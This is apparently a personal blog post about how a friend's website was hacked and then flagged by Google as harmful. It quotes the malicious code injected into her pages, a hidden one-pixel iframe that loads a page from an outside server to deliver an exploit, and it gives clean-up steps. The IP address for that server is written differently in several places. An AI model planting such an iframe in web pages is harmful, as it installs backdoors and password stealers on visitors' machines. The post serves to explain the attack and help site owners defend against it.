About a week ago, I was writing a blog post and wanted to link to a friend’s personal site. I wanted to make sure I got the link right, so I googled her name. I was surprised to discover that Google wouldn’t let me connect directly to her site – instead, under the description of her site as the warning “This site may harm your computer”.
I’d seen the “this site may harm your computer” message before. Several of my colleagues at Berkman are involved with a project and website called Stop Badware. It’s the brainchild of my friend Jonathan Zittrain, who is deeply concerned that the “generativity” of internet-connected PCs might lead to an environment so dangerous that users will switch to less-generative, single purpose Internet devices. (Zittrain’s excellent paper on generativity is here, and I’ve written previously on generativity and Stop Badware here.) Stop Badware maintains a catalog of sites that have been reported to distribute “badware”, which they describe as “…malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. ”
Google identifies sites that they believe are spreading badware and registers them with Stop Badware. My colleagues with Stop Badware have the unenviable task of managing the Google review process – if a site is tagged as spreading badware, the site’s administrator has the option of protesting and having the site reviewed by a team that includes folks at the Berkman Center. This is a very emotional issue for site owners, as having your site de-listed by Google can have very serious consequences for your traffic, your reputation, etc.
So what was my friend’s site doing on Google’s badlist? She doesn’t distribute software of any sort. Clearly some sort of mistake had been made. I wrote a snippy letter to my friends at Berkman, cc’d it to Zittrain and titled the missive, “Not the best day for Stop Badware”.
< iframe src= http://184.108.40.206/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>
The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://220.127.116.11/index.html.
That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.
Googling for the specific IP – 18.104.22.168 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)
It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 22.214.171.124 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.
So has my friend begun working for Russian/Panamanian black hat hackers? It’s pretty unlikely – she’s just not that sort of gal. So, how’d the code get onto her otherwise innocent website?
Simply put, it was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.
It’s great that Google is proactively searching for these dangerous bits of code, but it would be much, much better if they were also alerting owners of these compromised sites. When the program began, the logic – as I understand it – is that using site registration information (via whois) and alerting the contacts for a site would probably result in sites being thrown off their servers before they had a chance to appeal the decisions. That might have been a good call when most of the folks getting tagged for spreading malware were knowing distributors of the evil stuff. But in a world where lots of folks are having their sites hacked and are spreading malware unconsciously, it would be a really, really good idea to alert people who’ve been tagged by Google. In this case, both the tech and admin contacts for the site were legit, working email addresses and my friend would have been able to remove the offending code much more quickly than by having me discover it via Google.
How widespread is this new attack? That’s not clear – Stop Badware now has over 45,000 reports on URLs which Google or other partners have identified as distributing badware – my friends within the project report that daily reports of new sites have increased 300% over the past few weeks, suggesting there may be a wave of this sort of server compromise.
If your site is identified as spreading malware by Google and you think you’re experiencing this problem, do the following:
– Edit your html pages to remove the offending code.
– Change your password on your hosting account, making sure you’re using a secure password.
– Alert your hosting provider so they can be sure their software is patched and the attackers weren’t exploiting a known software hole.
– Visit the StopBadware site and use the “request a review” form to have them reexamine your site and remove the block. DON’T DO THIS UNTIL YOU’VE REMOVED ANY OFFENDING CODE, or you’re wasting your time and theirs.
These sorts of attacks are also reminders for Windows users that you can inadvertently install really nasty software on your machine even if you don’t open email attachments. Please, please keep your Windows installation patched and up to date, and consider using the Firefox browser. Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.
There’s a brief interview with Jonathan Zittrain in January’s Wired magazine, where the interviewer (Lucas Graves) is skeptical about JZ’s concerns about malware forcing users off PCs and onto less generative devices. Graves notes, “Things would have to get pretty damn bad to make us abandon our PCs.” JZ mentions that they could, indeed, get really bad. Hacked webservers that install code on unsuspecting that turns your PC into a zombie for spam relaying and other attacks? Maybe JZ’s more prescient than I thought…